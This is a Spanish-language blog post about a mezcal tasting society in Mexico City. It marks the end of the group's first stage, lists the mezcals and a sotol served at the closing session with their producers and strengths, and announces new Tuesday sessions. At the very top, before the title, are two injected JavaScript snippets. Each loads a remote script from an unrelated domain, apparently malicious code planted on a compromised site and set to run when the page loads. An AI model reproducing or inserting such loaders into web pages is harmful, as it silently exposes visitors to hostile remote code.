;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Mezcales Tradicionales de los Pueblos de México » 98. Nueva etapa de la Logia de los Mezcólatras

98. Nueva etapa de la Logia de los Mezcólatras


El 18 de octubre concluyó la primera etapa de vida de la Logia de los Mezcólatras, que fue posible gracias al apoyo incondicional de Hernán García, propietario de Red Fly taberna. Aún recuerdo la primera sesión, en diciembre de 2005, cuando saboreamos mezcales tradicionales (MT) de Oaxaca, Guerrero y Tamaulipas.
Ahora somos 1515 mezcólatras y hemos tenido la fortuna, ganada a pulso, de saborear 765 MT; y, lo más relevante, logramos que el tema de los MT se volviera parte de la vida de los ciudadanos y de la opinión pública.
Para cerrar esta etapa, nos reunimos en Red Fly y saboreamos:
1. Mezcal de maguey Tobalá elaborado por José García en Yogana, Ejutla, Oaxaca; mayo 2011, 53.3 % alc. vol.
2. Mezcal de puntas de maguey Espadín, maguey San Martinero y maguey Mexicano. Elaborado por Francisco Alonso en Yogana, Ejutla, Oaxaca; marzo 2011, 58.6 % alc. vol.
3. Sotol elaborado con sotoles silvestres por Gilberto Roldán en Nombre de Dios, Durango; octubre 2011, 48.3% alc. vol.
4. Mezcal de maguey Papalote silvestre elaborado por Benigno Sánchez en El Peral, Chilapa, Guerrero; temporada 2011, 50.1% alc. vol.
5. Mezcal de maguey Espadín cultivado, maguey Madrecuishe cultivado y maguey Bicuishe semisilvestre. Elaborado por Saturnino Juárez en Yegachín, Miahuatlán, Oaxaca; junio 2011, 50.7% alc. vol.
Las tareas inmediatas de la Logia son: a) impulsar la declaratoria de los MT como Patrimonio Cultural Inmaterial de México; b) defender el derecho, garantizado por el art. 4° constitucional, a preservar la cultura mezcalera del país; c) hacer llegar a más personas el conocimiento de los MT a través de la creación de nuevas sedes de la Logia, previa solicitud de quienes estén interesados en acogerla.
Como el trabajo y misión de la Logia deben continuar, las acostumbradas sesiones de los martes reinician el 25 de octubre a las 20 horas en Al Andar: Regina 27-C casi esquina con Isabel la Católica, Centro Histórico, DF. Cuota de recuperación: $200. Incluye los MT y el exquisito platillo mezcólatra.

http://impreso.milenio.com/node/9048525

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *